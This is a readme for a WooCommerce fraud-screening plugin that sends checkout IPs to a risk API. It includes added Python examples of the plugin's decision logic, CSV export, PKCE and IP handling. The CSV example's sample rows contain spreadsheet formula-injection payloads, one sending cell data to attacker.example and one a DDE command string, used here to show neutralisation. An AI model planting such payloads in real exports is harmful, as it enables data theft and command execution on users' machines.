Description
Predax Fraud Guard for WooCommerce is an opt-in checkout-screening tool. After you enter a Predax API key and choose a protection mode, the plugin sends the customer’s IP to the Predax API during WooCommerce checkout so your store can decide whether to allow, tag, or block the order.
On a fresh install the plugin does nothing — no outbound requests are made until you complete setup and pick a protection mode. The default mode once configured is tag-only (no blocking), so you can see flagged orders in your dashboard before turning on anything that rejects a customer.
How It Works
- You install and activate the plugin. Nothing happens — the plugin stays dormant until you finish setup.
- You enter a Predax API key (free account available at predax.io).
- You pick a protection mode in Fraud Guard Settings (or in the 3-step setup wizard). Choices: Tag + note, Block high risk, or Block critical only.
- On each WooCommerce checkout after that point, the plugin sends the customer’s IP address to the Predax API, receives back a risk score and signal flags (is_vpn / is_proxy / is_tor / is_datacenter), and tags / holds / blocks the order according to your configuration. Results are cached for up to 5 minutes per IP.
You can revoke the API key or switch the mode back to “Tag only” at any time.
Risk Tagging
Orders that reach the tag threshold (default: risk score 40) are tagged based on band:
- Risk 40–69 — tagged “Predax: Medium Risk” with an order note
- Risk 70–89 — tagged “Predax: High Risk” with an order note
- Risk 90–100 — tagged “Predax: Critical Risk” with an order note
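The How It Works steps and the tag bands above describe a small decision procedure: look the IP up (cached for five minutes), then allow, tag, hold or block according to the protection mode, the per-category Off/Monitor/Block setting, and the score. The following is an added example in Python that models that procedure; it is not the plugin's own PHP code. The JSON shape of POST /api/v1/check/ip, the field names, the default block threshold of 70 for the "Block high risk" mode, the Monitor-overrides-threshold behaviour (taken from the 1.4.1 and 1.7.0 changelog entries) and the sample IPs and scores are all constructed for the example, and the HTTP call is replaced by an in-memory lookup so it runs offline.

```python
"""Checkout screening decision logic modelled on the protection modes, risk bands
and 5-minute per-IP cache this readme describes.  Added example in Python, not
the plugin's own PHP code.  The JSON shape of POST /api/v1/check/ip, the field
names, the 70 default block threshold and the sample IPs/scores are all
assumptions constructed for the example; the HTTP call is replaced by an
in-memory lookup so it runs offline."""
import time
from dataclasses import dataclass

CACHE_TTL = 300   # readme: results cached for up to 5 minutes per IP
CRITICAL = 90     # readme: 90-100 is "Critical" and is always blocked in a blocking mode
SIGNALS = ("is_vpn", "is_proxy", "is_tor", "is_datacenter")

# Constructed stand-ins for API responses (RFC 5737 documentation addresses).
SAMPLE_API = {
    "203.0.113.10": {"risk_score": 12, "is_vpn": False, "is_proxy": False, "is_tor": False, "is_datacenter": False},
    "198.51.100.7": {"risk_score": 55, "is_vpn": True,  "is_proxy": False, "is_tor": False, "is_datacenter": False},
    "192.0.2.200":  {"risk_score": 78, "is_vpn": False, "is_proxy": True,  "is_tor": False, "is_datacenter": True},
    "192.0.2.99":   {"risk_score": 95, "is_vpn": False, "is_proxy": False, "is_tor": True,  "is_datacenter": False},
}


@dataclass
class Config:
    mode: str = "tag"             # "tag" | "block_high" | "block_critical" (readme default: tag only)
    tag_threshold: int = 40       # readme default
    block_threshold: int = 70     # assumption: floor of the "High Risk" band
    anon_action: str = "monitor"  # Off/Monitor/Block radio for the VPN/proxy/Tor category
    hold_high_risk: bool = False  # opt-in: High/Critical orders go On Hold instead of processing


class FakeClient:
    """Replaces the HTTP client; counts requests so the cache is observable."""
    def __init__(self):
        self.calls = 0

    def check_ip(self, ip):
        self.calls += 1
        return dict(SAMPLE_API[ip])


def risk_band(score, tag_threshold=40):
    """Map a 0-100 score onto the readme's bands; None means below the tag threshold."""
    if score >= CRITICAL:
        return "Critical"
    if score >= 70:
        return "High"
    if score >= tag_threshold:
        return "Medium"
    return None


class Screener:
    def __init__(self, client, cfg, clock=time.time):
        self.client, self.cfg, self.clock = client, cfg, clock
        self._cache = {}  # ip -> (expires_at, result); stands in for WP transients

    def lookup(self, ip):
        now = self.clock()
        hit = self._cache.get(ip)
        if hit and hit[0] > now:
            return hit[1]
        result = self.client.check_ip(ip)
        self._cache[ip] = (now + CACHE_TTL, result)
        return result

    def decide(self, ip):
        """Return the checkout outcome: allow / tag / hold / block, plus tag and note."""
        cfg, r = self.cfg, self.lookup(ip)
        score = r["risk_score"]
        flags = [s for s in SIGNALS if r.get(s)]
        anonymised = any(f in flags for f in ("is_vpn", "is_proxy", "is_tor"))
        blocking = cfg.mode in ("block_high", "block_critical")
        reason = None
        if blocking and score >= CRITICAL:
            reason = "critical risk score"          # 1.7.0 fix: Monitor cannot override this
        elif blocking and anonymised and cfg.anon_action == "block":
            reason = "anonymised connection (category set to Block)"
        elif (cfg.mode == "block_high" and score >= cfg.block_threshold
              and not (anonymised and cfg.anon_action == "monitor")):  # 1.4.1 fix
            reason = "risk score at or above block threshold"
        if reason:
            return {"action": "block", "tag": None, "note": f"Blocked: {reason} (score {score})"}
        band = risk_band(score, cfg.tag_threshold)
        if band is None:
            return {"action": "allow", "tag": None, "note": None}
        action = "hold" if cfg.hold_high_risk and band != "Medium" else "tag"
        return {"action": action, "tag": f"Predax: {band} Risk",
                "note": f"Predax risk score {score}; flags: {', '.join(flags) or 'none'}"}


if __name__ == "__main__":
    screener = Screener(FakeClient(), Config(mode="block_high"))
    for sample_ip in SAMPLE_API:
        print(sample_ip, screener.decide(sample_ip))
```

Run it as a script to see one outcome per sample IP. The two points worth noticing are the cache (a second checkout from the same IP inside the TTL does not call the client again) and the ordering of the block rules: the critical check comes first so that a category set to Monitor cannot rescue a 90+ IP, while a merely high score on a monitored VPN is tagged rather than blocked.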
Features
- Checkout screening (after you enable a protection mode) — every order is checked against Predax IP threat intelligence
- VPN / Proxy / Tor / Datacenter flags — detect anonymised connections at checkout
- Risk score threshold blocking — optionally block checkouts above a configurable risk score
- Automatic order hold (opt-in) — move high-risk orders to On Hold for manual review instead of processing them
- Order velocity rules (opt-in) — flag or block customers placing too many orders in a short window
- Billing country vs IP mismatch (opt-in) — flag or block orders where billing country differs from detected IP country
- Disposable email detection (opt-in) — reject checkouts using throwaway email providers (30+ supported)
- Refund / chargeback feedback (opt-in) — when a tagged order is refunded or cancelled, add its IP to your local deny list, and/or report the outcome to the Community Threat Network (when that opt-in is enabled)
- Order meta logging — stores risk score, threat flags, and detected country on every order for WooCommerce reporting
- Events Log — a dashboard page showing blocked attempts and flagged orders
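The Events Log can be exported to CSV, and the 1.7.0 changelog notes that the export neutralises spreadsheet formula injection (a billing email such as "=…@example.com" opening as a formula in Excel or Sheets). The following is an added example in Python showing the standard neutralisation, prefixing any cell that begins with a formula trigger character with a single quote; it is not the plugin's PHP implementation, and the column names and log rows are constructed for the example.

```python
"""Events Log CSV export with spreadsheet formula-injection neutralised, as the
1.7.0 changelog describes.  Added example in Python, not the plugin's PHP; the
column names and log rows are constructed."""
import csv
import io

# Leading characters that make Excel / Sheets / LibreOffice evaluate a cell.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def neutralise_cell(value):
    """Prefix a would-be formula with a single quote so it is shown as text.
    Real numbers pass through untouched (a risk score of 85 stays numeric); it
    is attacker-supplied strings such as "=..." or "-2+3" that get prefixed."""
    if value is None:
        return ""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return value
    text = str(value)
    # Look past leading whitespace: some spreadsheets trim before parsing.
    if text.lstrip().startswith(FORMULA_PREFIXES):
        return "'" + text
    return text


def export_events(rows, fieldnames):
    """Serialise Events Log rows; every cell goes through neutralise_cell."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({f: neutralise_cell(row.get(f)) for f in fieldnames})
    return buf.getvalue()


FIELDS = ["time", "ip", "risk_score", "flags", "reason", "billing_email"]
# Constructed Events Log rows; the last two carry attacker-controlled values.
SAMPLE_ROWS = [
    {"time": "2024-01-01 10:00:00", "ip": "203.0.113.10", "risk_score": 12,
     "flags": "", "reason": "allowed", "billing_email": "alice@example.com"},
    {"time": "2024-01-01 10:05:00", "ip": "192.0.2.99", "risk_score": 95,
     "flags": "is_tor", "reason": "blocked: critical risk",
     "billing_email": '=HYPERLINK("https://attacker.example/?x="&A1)@example.com'},
    {"time": "2024-01-01 10:07:00", "ip": "198.51.100.7", "risk_score": 55,
     "flags": "is_vpn", "reason": "-2+3+cmd|' /C calc'!A0",
     "billing_email": "+1@example.com"},
]


def exported_cells():
    """Parse the export back so the cells can be inspected programmatically."""
    return list(csv.DictReader(io.StringIO(export_events(SAMPLE_ROWS, FIELDS))))


if __name__ == "__main__":
    print(export_events(SAMPLE_ROWS, FIELDS))
```

The quote prefix is the widely used mitigation because it survives CSV quoting and round-trips through csv readers unchanged; the cost is that a legitimate value beginning with "-" or "+" is displayed with a leading apostrophe, which is why numeric columns are passed through as numbers rather than strings.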
Defaults
All protection toggles default to off on a fresh install. The only thing the plugin writes to options on activation is a database version marker for the events-log table. You will need to explicitly enable any rule you want to apply.
Free Tier
Sign up at predax.io for a free API key. No credit card required.
Third Party Services
This plugin connects to external services operated by Predax (https://predax.io) only when you have explicitly enabled a protection mode. By activating this plugin and entering an API key you agree to the Predax Terms of Service and Privacy Policy.
You are responsible for ensuring your use of customer IP data at checkout complies with applicable privacy laws (including but not limited to GDPR, CCPA) and your own store’s privacy policy. This plugin does not assert PCI-DSS, GDPR, or CCPA compliance on your behalf.
Predax IP Intelligence API
Used to look up a risk score and classification signals for each checkout IP.
- Data sent: the customer’s IP address at checkout; the browser-reported IANA timezone string (when available on the classic checkout form — used for the timezone-mismatch signal); your custom scoring weights (only if Custom Scoring is enabled).
- What is NOT sent: no billing/shipping names, street addresses, phone numbers, emails, product details, prices, or payment data. The billing-country-mismatch rule compares your order’s billing country against the API’s IP-country result locally — billing details never leave your site.
- When: during WooCommerce checkout validation, and only while a protection mode is saved in settings.
- Caching: classification results are cached in the site’s transients for 5 minutes per IP, so repeat checkouts from the same IP do not generate duplicate API calls.
- Endpoint: POST https://predax.io/api/v1/check/ip
- Service URL: https://predax.io
- Terms of Service: https://predax.io/terms
- Privacy Policy: https://predax.io/privacy
Predax Community Threat Network (opt-in, off by default)
The plugin can optionally send an anonymised telemetry signal — the IP address, its risk score and detection flags, its network (ASN) number and name, its country code, and the checkout outcome (allowed / monitored / blocked, or refund/chargeback feedback) — to the Predax Community Threat Network so all participating stores benefit from a shared feed. The Refund / Chargeback Feedback “Log” action reports through this same channel, so it requires this opt-in; its “Blacklist” action updates your local deny list regardless.
This feature is off by default. It is controlled by the ipsentry_woo_community_enabled option, which defaults to 'no', with a checkbox on the Advanced settings tab. The plugin will not send community-feedback telemetry unless you enable it. Customers’ personal data (names, emails, billing/shipping addresses, order contents) is never included in the telemetry payload.
- Endpoint: POST https://predax.io/api/v1/telemetry/event
- Service URL: https://predax.io
- Privacy Policy: https://predax.io/privacy
OAuth One-Click Connect (optional)
Only triggered when an administrator clicks the Connect with Predax button in the setup wizard. Your browser is redirected to predax.io to authorise the connection, which returns an API key to your site.
- Data sent: your WordPress site URL, site name, and a PKCE state/code-challenge pair. No customer data is involved.
- When: only during the click-to-connect OAuth flow.
- Endpoint: POST https://predax.io/api/v1/oauth/token
- Service URL: https://predax.io
- Privacy Policy: https://predax.io/privacy
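The connect flow above sends a PKCE state/code-challenge pair. The following is an added example in Python of how a client such as this plugin produces and checks that pair (RFC 7636, S256 method); it is not the plugin's own PHP code. The per-user pending store (modelled on the per-user OAuth transients mentioned in the 1.6.1 changelog) and all function names are this example's own.

```python
"""PKCE state/code-challenge pair for a one-click OAuth connect flow.
Added example in Python (RFC 7636, S256), not the plugin's PHP code; the
per-user pending store and function names are this example's own."""
import base64
import hashlib
import hmac
import secrets


def b64url(raw):
    """BASE64URL without padding, as RFC 7636 requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def new_pkce_pair():
    """code_verifier: 32 random bytes -> 43 unreserved characters (RFC 7636 4.1);
    code_challenge = BASE64URL(SHA256(ASCII(code_verifier)))."""
    verifier = b64url(secrets.token_bytes(32))
    challenge = b64url(hashlib.sha256(verifier.encode("ascii")).digest())
    return verifier, challenge


def begin_connect(pending, user_id):
    """Save verifier + state for *this* admin user and return the parameters
    that go into the authorise redirect.  Keying by user stops two admins
    running the wizard at once from overwriting each other."""
    verifier, challenge = new_pkce_pair()
    state = secrets.token_urlsafe(32)
    pending[user_id] = {"verifier": verifier, "state": state}
    return {"code_challenge": challenge, "code_challenge_method": "S256", "state": state}


def finish_connect(pending, user_id, returned_state):
    """Callback side: the returned state must equal the one saved for this
    user, and the entry is consumed so the callback cannot be replayed.
    Returns the code_verifier to send with the token request, or None."""
    entry = pending.pop(user_id, None)
    if entry is None or not hmac.compare_digest(entry["state"], returned_state):
        return None
    return entry["verifier"]


def challenge_matches(verifier, challenge):
    """The check the authorisation server performs on the token request."""
    expected = b64url(hashlib.sha256(verifier.encode("ascii")).digest())
    return hmac.compare_digest(expected, challenge)


if __name__ == "__main__":
    store = {}
    params = begin_connect(store, user_id=1)
    verifier = finish_connect(store, 1, params["state"])
    print("verifier matches challenge:", challenge_matches(verifier, params["code_challenge"]))
```

The state value binds the callback to the browser session that started the flow (CSRF protection); the verifier/challenge pair binds the token request to the party that started it, so an intercepted authorisation code is useless without the verifier that never left the site.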
Cookies set by this plugin
ipsentry_tz: set on WooCommerce checkout pages (only while an API key is configured) via assets/js/ipsentry-woo-tz.js. Stores the customer’s browser-reported IANA timezone (string, max 64 chars). Used server-side for the optional timezone-mismatch fraud rule. Expires after 24 hours (max-age=86400), path=/, SameSite=Lax, and marked Secure on HTTPS stores. The plugin reads this cookie only at checkout-validation time.
The plugin does not set any advertising, analytics, or tracking cookies.
Installation
- Make sure WooCommerce is installed and activated.
- Upload the predax-fraud-guard-for-woocommerce folder to /wp-content/plugins/.
- Activate the plugin through the Plugins menu in WordPress.
- The Setup Wizard launches on first activation. Either click Connect with Predax for OAuth one-click connection, or enter your API key manually.
- Pick a protection preset (Recommended / Strict / Monitor Only). This is the step where you opt in — IP lookups begin after this point.
- Fine-tune individual rules at Fraud Guard Settings any time.
FAQ
Does the plugin phone home before I finish setup?
No. Before you enter an API key and save a protection mode, the plugin makes zero outbound requests to predax.io. Nothing happens silently on activation.
Will it block legitimate customers?
Only if you enable a blocking mode. The default mode is Tag only (no blocking; orders just get tags and notes), and no checks run at all until setup is complete. In the setup wizard, the pre-selected Recommended preset enables blocking of high-risk checkouts (risk score 50+); choose Monitor Only instead if you don’t want any blocking yet. Each preset card lists exactly what it switches on.
What is the risk score?
A score from 0 to 100 representing how likely an IP is to be associated with fraud, anonymisation, or abuse. 0 = clean residential IP, 100 = known Tor exit or commercial VPN. The score combines VPN/proxy/Tor detection, datacenter identification, historical abuse signals, and geographic heuristics.
Does it work with Cloudflare?
Yes. Enable Fraud Guard Settings → Advanced → “Behind a proxy / CDN” (or the same toggle on the WooCommerce Predax tab). With it on, the plugin reads the real customer IP from the CF-Connecting-IP / X-Forwarded-For headers instead of the Cloudflare edge IP. It is off by default: when your store connects directly to visitors, trusting those headers would let a customer spoof their IP to bypass fraud checks, so only turn it on when a proxy/CDN really is in front of your site.
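The spoofing risk in that answer is easy to show concretely. Below is an added example in Python (not the plugin's PHP code) of the two resolution paths: with the toggle off only the socket peer address counts, with it on the forwarded headers are consulted. The header names come from the FAQ; the preference order (CF-Connecting-IP first, then the right-most X-Forwarded-For hop, which is the one appended by the proxy actually in front of the store) and the sample requests are this example's own choices.

```python
"""Client-IP resolution for the "Behind a proxy / CDN" toggle described in the
FAQ.  Added example in Python, not the plugin's PHP code.  Header names follow
the FAQ; the preference order and the sample requests are this example's own."""
import ipaddress


def _as_ip(value):
    """Return a normalised IP string, or None if the value is not an address."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except (ValueError, AttributeError):
        return None


def client_ip(remote_addr, headers, behind_proxy=False):
    """IP address to screen for a request.

    behind_proxy=False (the default): only the socket peer address counts, so
    a forged X-Forwarded-For on a direct connection is ignored.
    behind_proxy=True: trust CF-Connecting-IP if present; otherwise take the
    right-most X-Forwarded-For hop, i.e. the one appended by the proxy that is
    actually in front of the store.  The left-most hop is still client-supplied
    and is what a spoofer controls.  Unparseable values fall back to the peer.
    """
    if behind_proxy:
        lowered = {k.lower(): v for k, v in headers.items()}
        ip = _as_ip(lowered.get("cf-connecting-ip", ""))
        if ip:
            return ip
        hops = [h for h in lowered.get("x-forwarded-for", "").split(",") if h.strip()]
        for hop in reversed(hops):
            ip = _as_ip(hop)
            if ip:
                return ip
    return _as_ip(remote_addr) or remote_addr


# Constructed requests using RFC 5737 documentation addresses.
DIRECT_SPOOF = {   # store exposed directly; the visitor forges a header
    "remote_addr": "198.51.100.7",
    "headers": {"X-Forwarded-For": "203.0.113.10"},
}
VIA_CDN = {        # an assumed edge node (192.0.2.1) sits in front of the store
    "remote_addr": "192.0.2.1",
    "headers": {"CF-Connecting-IP": "198.51.100.7",
                "X-Forwarded-For": "203.0.113.10, 198.51.100.7"},
}


def demo():
    """Resolve the constructed requests under both toggle settings."""
    return {
        "direct_off": client_ip(DIRECT_SPOOF["remote_addr"], DIRECT_SPOOF["headers"]),
        "direct_on": client_ip(DIRECT_SPOOF["remote_addr"], DIRECT_SPOOF["headers"], True),
        "cdn_on": client_ip(VIA_CDN["remote_addr"], VIA_CDN["headers"], True),
        "cdn_xff_only": client_ip("192.0.2.1", {"X-Forwarded-For": "203.0.113.10, 198.51.100.7"}, True),
        "garbage": client_ip("192.0.2.1", {"CF-Connecting-IP": "not-an-ip"}, True),
    }


if __name__ == "__main__":
    for name, ip in demo().items():
        print(f"{name:13s} -> {ip}")
```

The "direct_on" case is the failure mode the FAQ warns about: with the toggle on and no proxy in front, the visitor's forged header becomes the screened IP. The "cdn_on" case shows the toggle doing its job, and also why the left-most X-Forwarded-For value must not be trusted even behind a CDN: the visitor planted 203.0.113.10 there before the edge appended the real address.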
How do I test it without affecting real customers?
On the Fraud Guard Settings → Developer tab, enter a Test IP Override. Every checkout is then evaluated as if it came from that IP. A red admin banner reminds you test mode is active. Clear the override before going live.
Use 185.220.101.1 (risk 85, Tor-adjacent) to exercise blocking paths, or 1.1.1.1 to verify pass-through.
What order metadata is stored?
On each tagged order the plugin stores:
- _ipsentry_risk_score: numeric risk score (0–100)
- _ipsentry_ip: detected customer IP
- _ipsentry_country_code: detected IP country code
- _ipsentry_flags: comma-separated threat flag list
Does it work alongside the Predax Security plugin?
Yes. The plugins are independent but complementary: Security protects logins and registrations, Fraud Guard protects WooCommerce checkout. Both can share the same API key.
Changelog
1.7.0
- Rebrand: IPSentry is now Predax. This is the first WordPress.org release of the WooCommerce plugin. The plugin name, admin menu, and links now use Predax (predax.io). Your existing settings, API key, and order data are preserved — internal option names are unchanged, so nothing needs reconfiguring.
- Admin menu moved to a lower position so it no longer sits among the core WordPress menu items.
- Compliance: the OAuth-callback exit page now registers and prints its CSS/JS through the WordPress script API (wp_register_style/wp_register_script + wp_print_styles/wp_print_scripts) instead of hand-written tags. The WooCommerce settings save and checkout timezone read run inside WooCommerce’s own nonce-verified flows and carry inline justifications for the static analyser.
- Compatibility: declared WooCommerce High-Performance Order Storage (HPOS) compatibility.
- Fix: the order-velocity time window now uses a timestamp-based date query (the previous datetime-string form could be misread by WooCommerce and count orders outside the window).
- Hardening: checkout error notices are HTML-escaped before being added; the settings-import upload is capped at 512 KB with bounded JSON depth; the API base URL accepts http/https only; the timezone cookie is marked Secure on HTTPS stores; the Store API block path gained an explicit return after blocking.
- Clarity: Refund / Chargeback Feedback labels and docs now state that “Log” reports go through the Community Threat Network opt-in; the readme documents exact API endpoints and the full telemetry data list.
- New: IP allow-list (never block trusted IPs) and a managed deny-list, both supporting single IPs and CIDR ranges (IPv4 + IPv6), editable from the settings page and the WooCommerce Predax tab.
- New: the Community Threat Network opt-in is now a settings toggle (still off by default) instead of import/export only.
- New: Events Log retention setting (default 90 days; 0 = keep forever) with automatic daily cleanup, plus a 7-day/all-time stats summary, CSV export, and a Clear Log button.
- New: “Behind a proxy / CDN” setting (off by default). Enable it when your store is behind Cloudflare, a CDN, or a reverse proxy so the real customer IP is read from forwarded headers; when off, only the direct connection IP is used, so the customer IP cannot be spoofed to bypass fraud checks.
- Security: the Events Log CSV export now neutralises spreadsheet formula-injection — a billing email such as “=…@example.com” can no longer execute as a formula when the export is opened in Excel/Sheets.
- Fix: the “Flag for review” action on the velocity, disposable-email, and billing-country-mismatch rules now reliably tags the order, adds the order note, and writes the Events Log entry (previously these markers could be dropped on processed orders).
- Fix: a critically-risky IP (risk score 90+) is now always blocked while a blocking mode is active, even when its VPN/proxy category is set to Monitor.
- Fix: the WooCommerce Predax settings tab now saves correctly (removed an invalid nested import form; import is now on the Fraud Guard Developer page).
- Hardening: /0 (match-all) entries are rejected in the IP allow/deny lists, and uninstall now cleans every site on a multisite network.
- No change to the opt-in model — the plugin still makes zero outbound requests until you enter an API key and save a protection mode.
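The allow-list and deny-list entries from this release (single IPs and CIDR ranges, IPv4 and IPv6, /0 refused, trusted IPs never blocked) are worth seeing as validation code, because a list that silently accepts a match-all entry or fails to match IPv4-mapped IPv6 clients gives a false sense of coverage. The following is an added example in Python, not the plugin's PHP implementation; the list contents are constructed documentation ranges and the function names are this example's own.

```python
"""Allow/deny-list handling as described for 1.7.0: single IPs and CIDR ranges,
IPv4 and IPv6, with /0 (match-all) rejected and the allow-list taking precedence
("never block trusted IPs").  Added example in Python, not the plugin's PHP;
the list contents are constructed documentation ranges."""
import ipaddress


class ListEntryError(ValueError):
    """Raised for an entry that must not be saved."""


def parse_entry(text):
    """Turn one list line into an ip_network.  '192.0.2.7' becomes /32 and
    '2001:db8::1' becomes /128.  A CIDR with host bits set (192.0.2.7/24) is
    normalised to its network.  /0 of either family is refused because it
    would silently allow or deny every visitor."""
    try:
        net = ipaddress.ip_network(text.strip(), strict=False)
    except ValueError as exc:
        raise ListEntryError(f"not an IP or CIDR: {text!r}") from exc
    if net.prefixlen == 0:
        raise ListEntryError(f"/0 entries are rejected: {text!r}")
    return net


def parse_list(lines):
    """Parse a saved list.  Blank lines and '#' comments are skipped; every bad
    entry is reported together so an admin cannot save a half-valid list."""
    nets, errors = [], []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        try:
            nets.append(parse_entry(line))
        except ListEntryError as exc:
            errors.append(str(exc))
    if errors:
        raise ListEntryError("; ".join(errors))
    return nets


def _normalise(ip):
    """Unwrap IPv4-mapped IPv6 (::ffff:192.0.2.7) so an IPv4 rule still matches
    a client that arrived over a dual-stack socket."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def matches(ip, nets):
    """True if ip falls inside any network of the same address family."""
    addr = _normalise(ip)
    return any(addr in n for n in nets if n.version == addr.version)


def evaluate(ip, allow, deny):
    """'allow' beats 'deny'; None means neither list applies."""
    if matches(ip, allow):
        return "allow"
    if matches(ip, deny):
        return "deny"
    return None


# Constructed lists an admin might save.  Note the allow-list /48 sits inside
# the denied /32, which is exactly where precedence matters.
ALLOW = parse_list(["203.0.113.0/24   # office", "2001:db8:1::/48"])
DENY = parse_list(["198.51.100.7", "198.51.100.0/25", "2001:db8::/32"])


if __name__ == "__main__":
    for probe in ("203.0.113.9", "198.51.100.7", "198.51.100.200",
                  "2001:db8:1::5", "2001:db8:2::5", "::ffff:198.51.100.7"):
        print(f"{probe:22s} -> {evaluate(probe, ALLOW, DENY)}")
```

Two details are easy to get wrong in an implementation like this: refusing /0 has to happen after parsing (so "0.0.0.0/0" and "::/0" are both caught), and the address-family check in matches() is what keeps an IPv6 client from ever being compared against an IPv4 network, while the IPv4-mapped unwrap keeps IPv4 rules effective behind a dual-stack listener.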
1.6.2
- Compliance: community-feedback telemetry is now explicitly opt-in (off by default) behind a new ipsentry_woo_community_enabled option. Existing installs stop sending telemetry until they flip this on.
- Compliance: all phoning-home defaults flipped to off: block_proxy, block_tor, and monitor_vpn default to 'no' on fresh installs.
- Compliance: removed the self-hosted plugin updater class per WP.org Guideline 8.
- Compliance: extracted every inline <script>/<style> block to enqueued asset files. OAuth-callback exit page now references an external CSS/JS pair.
- Compliance: Privacy Policy content hook (wp_add_privacy_policy_content) so admins can pull suggested text from Tools → Privacy.
- Compliance: Setup-wizard privacy-disclosure boxes added above OAuth button, manual API-key field, and preset-picker cards.
- Compliance: nonce-before-cap order fixed on every admin-post and AJAX handler.
- Compliance: input sanitisation tightened on every $_GET/$_POST/$_FILES read; imported settings values now validated per option type.
- Compliance: Test-mode admin notice now scoped to Predax pages only (not global).
- Added: uninstall.php drops the events-log table and deletes every ipsentry_woo_* option on plugin deletion.
- Added: Domain Path: /languages header + minimal .pot translation template.
- Added: .distignore excluding dev artefacts from the WP.org zip.
- No behaviour change for existing installs other than the community-feedback gate; core IP checking still works as before.
1.6.1
- Improved: OAuth connect popup now auto-closes reliably after authorization.
- Improved: Per-user OAuth transients prevent conflicts on multi-admin sites.
1.6.0
- New: Setup Wizard — guided 3-step setup on first activation with fraud protection presets (Recommended, Strict, Monitor Only).
- New: One-Click Connect — click “Connect with Predax” in the setup wizard to link your store via OAuth. No API key to copy or paste.
- New: “Run Setup Wizard” link in Developer tab to re-run the wizard at any time.
1.5.0
- New: Events Log admin page (Predax Events Log) — two tabs showing blocked checkout attempts and flagged/held orders with IP, risk score, flags, reason, and order links.
- New: Predax risk column on WooCommerce Orders list — shows colour-coded score badge and top threat flag.
- Improvement: Orders now store a combined _ipsentry_flags meta key for quick flag lookup.
1.4.3
- New: Dedicated settings page under Predax Fraud Guard in the WordPress admin left nav — same tabbed UI as the Security plugin.
1.4.2
- New: Settings import/export — back up your configuration or copy it between sites.
- New: Support Email field — if set, checkout block error messages include a “Contact us at…” line.
1.4.1
- Fix: VPN/proxy customers set to Monitor mode were incorrectly blocked by the risk threshold.
1.4.0
- New: Automatic order hold, order velocity rules, billing country vs IP mismatch, disposable email detection, refund/chargeback feedback, test IP override.
1.3.0
- New: Off/Monitor/Block radio groups for VPN, proxy, and Tor.
- New: Custom risk scoring weights — adjust per-signal contribution to the final risk score.
1.2.0
- New: Country-based blocking at checkout. Whitelist support. API timeout handling.
1.1.0
- New: Configurable risk threshold. Order meta. Detailed order notes.
1.0.0
- Initial release. Tag-only fraud screening at checkout. VPN / proxy / Tor / datacenter detection.
